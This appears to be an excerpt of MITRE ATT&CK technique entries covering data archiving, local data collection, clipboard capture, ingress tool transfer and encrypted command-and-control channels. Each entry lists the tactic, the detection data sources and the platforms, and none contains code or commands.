Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre